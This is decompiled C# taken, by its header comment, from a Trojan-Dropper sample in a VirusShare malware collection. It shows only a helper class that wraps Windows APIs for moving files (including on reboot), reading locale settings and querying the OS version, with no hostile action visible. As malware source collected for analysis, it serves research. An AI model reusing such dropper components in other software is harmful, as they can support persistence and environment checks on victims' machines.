// Decompiled with JetBrains decompiler // Type: Poly.API // Assembly: Poly, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 618F3010-979B-4F78-8F99-D5C35E30AA2E // Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Sysn.bshb-a13f90b28df8b73652beb4c3c95ff1b8dc0c2fc41dee8f7d6acdd43828a0aadc.exe using System; using System.Runtime.InteropServices; using System.Text; namespace Poly { public static class API { private const uint LOCALE_SYSTEM_DEFAULT = 1024; [DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)] public static extern bool MoveFileEx( string lpExistingFileName, string lpNewFileName, API.MoveFileFlags dwFlags); [DllImport("kernel32.dll")] public static extern int GetLocaleInfo( uint Locale, uint LCType, [Out] StringBuilder lpLCData, int cchData); public static string GetInfo(uint lInfo) { StringBuilder lpLCData = new StringBuilder(256); int localeInfo = API.GetLocaleInfo(1024U, lInfo, lpLCData, lpLCData.Capacity); return localeInfo > 0 ? lpLCData.ToString().Substring(0, localeInfo - 1) : string.Empty; } [DllImport("kernel32.dll")] public static extern bool GetVersionEx(ref API.OSVERSIONINFOEX osVersionInfo); [Flags] public enum MoveFileFlags { MOVEFILE_REPLACE_EXISTING = 1, MOVEFILE_COPY_ALLOWED = 2, MOVEFILE_DELAY_UNTIL_REBOOT = 4, MOVEFILE_WRITE_THROUGH = 8, MOVEFILE_CREATE_HARDLINK = 16, // 0x00000010 MOVEFILE_FAIL_IF_NOT_TRACKABLE = 32, // 0x00000020 } public struct OSVERSIONINFOEX { public int dwOSVersionInfoSize; public int dwMajorVersion; public int dwMinorVersion; public int dwBuildNumber; public int dwPlatformId; [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 128)] public string szCSDVersion; public short wServicePackMajor; public short wServicePackMinor; public short wSuiteMask; public byte wProductType; public byte wReserved; } } }